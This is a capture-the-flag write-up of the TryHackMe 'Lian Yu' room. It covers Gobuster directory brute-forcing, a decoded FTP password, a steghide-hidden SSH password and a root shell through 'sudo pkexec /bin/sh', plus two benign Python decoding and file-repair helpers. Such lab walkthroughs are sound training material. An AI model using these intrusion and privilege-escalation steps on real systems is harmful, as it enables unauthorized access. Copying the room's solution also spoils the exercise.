Introduction
Hey folks, Volk here. In this writeup we solve and explain the Lian Yu room on TryHackMe.
It is rated as a beginner-level challenge.
Tools Used
Nmap, Gobuster, CyberChef, the tunnelsup.com hash analyzer, ftp, steghide, unzip, ssh and GTFOBins.
Enumeration
First, I scanned the target with Nmap to find the open ports, OS and service versions (the target IP differs between some of the outputs below because they were captured across several deployments of the room):
nmap -A [Machine_IP]
-A: OS detection, Script Scanning, Version detection, and traceroute
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35098/udp status
| 100024 1 55094/tcp status
| 100024 1 58104/tcp6 status
|_ 100024 1 59600/udp6 status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
I tried to log in to FTP with the anonymous account (username and password anonymous), but the server refused it, so I moved on to port 80 (HTTP).
The page itself held nothing important, not even in the source code, so let's brute-force hidden directories with Gobuster:
gobuster dir -u http://10.10.166.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dir: use directory brute force
-u: to specify the target URL
-w: the path of the wordlist to use
that’s the result:
===============================================================
[+] Url: http://10.10.166.42
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
/island (Status: 301) [Size: 235] [--> http://10.10.166.42/island/]
So there is a directory called island. I opened it and checked the page source:
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</h2>
The code word vigilante is rendered with color:white, so it is invisible against the page but sits in plain sight in the source. We will use this word later; for now, let's run Gobuster against the island directory:
gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
[+] Url: http://10.10.166.42/island
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
/2100 (Status: 301) [Size: 240] [--> http://10.10.166.42/island/2100/]
Finding the /2100 directory answers the first question. I went to http://[Machine_IP]/island/2100, found nothing interesting on the page itself, and checked the source code:
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
The HTML comment hints that a file with the .ticket extension is hosted under /2100, so let's brute-force the filename with Gobuster, using -x to append the ticket extension to every wordlist entry (the command has to target /island/2100, as the output header confirms):
gobuster dir -u http://10.10.166.42/island/2100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x ticket
===============================================================
[+] Url: http://10.10.132.83/island/2100/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: ticket
[+] Timeout: 10s
===============================================================
/green_arrow.ticket (Status: 200) [Size: 71]
Finding this file answers the second question. Opening it returns the encoded password:
RTy8yhBQdscX
I tried several tools to identify the encoding until the hash analyzer at tunnelsup.com suggested base64. A base64 decode in CyberChef runs without error (12 characters, so no padding is needed) but yields non-printable bytes, the usual sign of the wrong alphabet, so I went through the other base encodings until base58 produced a readable password. Note that the string contains none of 0, O, I or l, the four characters base58 leaves out of its alphabet.
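The identification step above can be done offline instead of by trial and error in a web tool. The following is an added example, not code from the original writeup: it implements a base58 decoder (the Bitcoin alphabet, which has no 0, O, I or l) and tries the ticket string under base64, base32 and base58, keeping only the decodings that come out as printable ASCII. It goes slightly beyond the text by handling the general case (padding-less base64/base32 input and leading-zero bytes in base58). The only input it uses is the ticket value shown above; the function names are my own.

```python
import base64
import string

# Bitcoin/IPFS base58 alphabet: no 0, O, I or l, which is why a base58 token
# can be mistaken for base64 at a glance.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# The ticket value from green_arrow.ticket as shown in the writeup.
TICKET = "RTy8yhBQdscX"


def base58_decode(token: str) -> bytes:
    """Decode a base58 string; leading '1' characters encode leading zero bytes."""
    n = 0
    for ch in token:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"not a base58 character: {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(token) - len(token.lstrip("1"))
    return b"\x00" * leading_zeros + body


def is_printable_ascii(data: bytes) -> bool:
    """True when every byte is a printable ASCII letter, digit, punctuation or space."""
    allowed = set((string.ascii_letters + string.digits + string.punctuation + " ").encode())
    return bool(data) and all(b in allowed for b in data)


def candidate_decodings(token: str) -> dict:
    """Decode token under each supported alphabet and keep only printable results.

    base64/base32 input is padded to its block size first, so a token stored
    without trailing '=' is not rejected for that reason alone.
    """
    attempts = {}
    try:
        attempts["base64"] = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except Exception:
        pass
    try:
        attempts["base32"] = base64.b32decode(token + "=" * (-len(token) % 8))
    except Exception:
        pass
    try:
        attempts["base58"] = base58_decode(token)
    except ValueError:
        pass
    return {name: data for name, data in attempts.items() if is_printable_ascii(data)}


if __name__ == "__main__":
    # Only the alphabet that yields readable text survives the filter.
    for name, data in candidate_decodings(TICKET).items():
        print(f"{name}: {data.decode('ascii')}")
```

The base64 attempt is kept deliberately: it succeeds syntactically, which is exactly what misled the online analyzer, and is then discarded because the bytes it produces are not text. The printable-ASCII filter is the check that separates the right alphabet from the wrong one.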
Gaining Access
Now let's log in to FTP with the hidden username (vigilante) and the decoded password:
Connected to 10.10.124.174.
220 (vsFTPd 3.0.2)
Name (10.10.124.174:kali): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Login successful. Now let's list the files and download the interesting ones:
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 2020 .
drwxr-xr-x 4 0 0 4096 May 01 2020 ..
-rw------- 1 1001 1001 44 May 01 2020 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 2020 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 2020 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 2020 .profile
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
ftp> get .other_user
ftp> get Queen's_Gambit.png
ftp> get aa.jpg
ftp> get Leave_me_alone.png
We downloaded all the interesting files; now let's move up one directory to see what else is on the server:
ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 May 01 2020 .
drwxr-xr-x 23 0 0 4096 Apr 30 2020 ..
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
226 Directory send OK.
Analyzing the Files
As you can see, there is another home directory, so we have a second username, slade, to use later. For now, let's analyze the downloaded files. The .other_user file contained nothing helpful beyond the name Slade, and ExifTool showed no useful metadata in the images. Leave_me_alone.png fails to open, and the reason is a wrong file signature: the first bytes do not match the PNG magic (89 50 4E 47 0D 0A 1A 0A), so image viewers reject the file before parsing it. If only those bytes are damaged, writing the correct eight-byte signature back over the start of the file makes it viewable again. The aa.jpg file carries steghide-embedded data, which extracts with the passphrase password.
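The signature check and repair described above, as an added example that is not part of the original writeup: it identifies a file by its magic bytes, verifies that an IHDR chunk sits where a PNG keeps it before touching anything, and then rewrites the first eight bytes with the real PNG signature. The damaged sample bytes are constructed inline (a 1x1 RGB IHDR with the signature zeroed out), because the actual Leave_me_alone.png is not reproduced on this page; the function and variable names are my own.

```python
import zlib

# Magic bytes (file signatures) an image viewer checks before parsing anything else.
PNG_SIG = bytes.fromhex("89504E470D0A1A0A")
SIGNATURES = {
    "png": PNG_SIG,
    "jpeg": bytes.fromhex("FFD8FF"),
    "zip": b"PK\x03\x04",
}


def identify(data: bytes):
    """Return the type whose signature matches the start of data, or None."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def looks_like_png_body(data: bytes) -> bool:
    """Every PNG starts with an IHDR chunk right after the 8-byte signature:
    a 4-byte big-endian length of 13 followed by the chunk type b'IHDR'."""
    return len(data) >= 16 and data[8:16] == b"\x00\x00\x00\x0dIHDR"


def fix_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the real PNG signature.

    Only done when the IHDR chunk is where a PNG keeps it, so a file that is
    simply not a PNG is left alone instead of being turned into a fake one.
    """
    if not looks_like_png_body(data):
        raise ValueError("IHDR not found at offset 8; more than the signature is wrong")
    return PNG_SIG + data[8:]


def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """PNG chunk layout: length, type, payload, CRC-32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return len(payload).to_bytes(4, "big") + ctype + payload + crc.to_bytes(4, "big")


# Constructed sample: IHDR for a 1x1 8-bit RGB image, with the signature zeroed
# out to mimic the "wrong signature" error from the writeup.
IHDR = _png_chunk(b"IHDR", (1).to_bytes(4, "big") + (1).to_bytes(4, "big") + b"\x08\x02\x00\x00\x00")
DAMAGED = b"\x00" * 8 + IHDR


if __name__ == "__main__":
    import sys
    # With a path argument the script checks and repairs that file; without one
    # it runs on the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else DAMAGED
    print("detected:", identify(data))
    if identify(data) != "png" and looks_like_png_body(data):
        fixed = fix_png_signature(data)
        print("after repair:", identify(fixed))
        if len(sys.argv) > 1:
            with open(sys.argv[1] + ".fixed.png", "wb") as fh:
                fh.write(fixed)
```

Run as `python3 fixsig.py Leave_me_alone.png` (script name is my own) to get a `.fixed.png` next to the original; the IHDR check is what stops the script from stamping a PNG header onto a file whose corruption goes deeper than the first eight bytes.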
$ steghide extract -sf aa.jpg
Enter passphrase: password
wrote extracted data to "ss.zip".
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
SSH
$ ssh slade@10.10.120.240
slade@10.10.120.240's password: M3tahuman
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ cat user.txt
THM{Root_Flag}
Privilege Escalation
Let's run sudo -l to see which commands this user (slade) may execute as root:
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Nice, we can run pkexec as root. GTFOBins lists the following sudo escape for pkexec:
sudo pkexec /bin/sh
Let's execute it to escalate to root:
slade@LianYu:~$ sudo pkexec /bin/sh
# ls
root.txt
# cat root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{Root_Flag}
--DEATHSTROKE
And we got the root flag :). Thanks for reading the writeup; see you in the next one.